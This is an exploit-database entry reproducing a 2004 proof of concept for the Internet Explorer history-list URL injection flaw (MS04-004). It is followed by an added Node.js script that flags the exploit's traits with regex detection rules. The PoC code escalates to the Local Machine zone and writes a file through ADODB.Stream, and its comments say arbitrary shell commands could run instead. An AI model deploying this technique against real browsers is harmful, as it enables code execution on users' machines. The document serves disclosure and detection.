
MS Internet Explorer URL Injection in History List (MS04-004)

Author: Andreas Sandblad
Risk: Security Risk Unsorted
0day-ID: 0day-ID-8374
Category: remote exploits
Date added: 04-02-2004
Platform: unsorted
=============================================================
MS Internet Explorer URL Injection in History List (MS04-004)
=============================================================

// Andreas Sandblad, 2004-02-03, patched by MS04-004

// Name:     payload
// Purpose:  Run payload code called from Local Machine zone.
//           The code may be arbitrary such as executing shell commands.
//           This demo simply creates a harmless textfile on the desktop.
function payload() {
  file = "sandblad.txt";
  o = new ActiveXObject("ADODB.Stream");
  o.Open();
  o.Type=2;
  o.Charset="ascii";
  o.WriteText("You are vulnerable!");
  o.SaveToFile(file, 2);
  o.Close();
  alert("File "+file+" created on desktop!");
}

// Name:     trigger
// Purpose:  Inject javascript url in history list and run payload
//           function when the user hits the backbutton.
function trigger(len) {
  if (history.length != len)
    payload();
  else
    return "<title>-</title><body onload=external.NavigateAndFind('res:','','')>";
}

// Name:    backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
  location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}

// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
  backbutton();
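
A defensive complement to the proof of concept above, added here and not part of the original advisory: a small Node.js triage script that flags script text combining the traits the PoC relies on (a `javascript:` URL assigned to `location`, a `history.length` check, `external.NavigateAndFind` with a `res:` URL, and an `ADODB.Stream` file write). The rule names, the threshold and both samples are constructed for illustration and are not vendor signatures.

```javascript
// Added example: static triage for the traits of the MS04-004 PoC on this page.
// Rule ids and the "suspicious" threshold are assumptions made for this example.
const RULES = [
  { id: "js-url-navigation",    // location = 'javascript:...'
    re: /\blocation(?:\s*\.\s*href)?\s*=\s*["']javascript:/i },
  { id: "history-length-probe", // history.length used as a state check
    re: /\bhistory\s*\.\s*length\b/i },
  { id: "navigateandfind-res",  // external.NavigateAndFind('res:', ...)
    re: /\bexternal\s*\.\s*NavigateAndFind\s*\(\s*["']res:/i },
  { id: "adodb-stream-write",   // ADODB.Stream object followed by SaveToFile
    re: /ActiveXObject\s*\(\s*["']ADODB\.Stream["']\s*\)[\s\S]*?\.SaveToFile\s*\(/i },
];

// Drop whole-line // comments so text that only documents the issue is ignored.
function stripLineComments(src) {
  return src.replace(/^\s*\/\/.*$/gm, "");
}

// Return the matched rule ids and a verdict for one script or HTML body.
function scan(src) {
  const code = stripLineComments(src);
  const hits = RULES.filter((r) => r.re.test(code)).map((r) => r.id);
  const has = (id) => hits.includes(id);
  // Assumed threshold: a javascript: navigation plus either history-related trait.
  const suspicious = has("js-url-navigation") &&
    (has("history-length-probe") || has("navigateandfind-res"));
  return { hits, suspicious };
}

// Constructed sample: reduced lines modelled on the listing above.
const SAMPLE_POC = `
o = new ActiveXObject("ADODB.Stream"); o.SaveToFile(file, 2);
function trigger(len) {
  if (history.length != len) payload();
  else return "<body onload=external.NavigateAndFind('res:','','')>";
}
location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
`;

// Constructed sample: ordinary navigation code that mentions the API in a comment.
const SAMPLE_BENIGN = `
// external.NavigateAndFind('res:','','') was abused before MS04-004
if (history.length > 1) history.back();
location = '/home';
`;

console.log(scan(SAMPLE_POC), scan(SAMPLE_BENIGN));
```

The line-comment stripping is deliberately conservative, so block comments and string contents are still scanned; treat a hit as a reason for manual review rather than a verdict.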


 
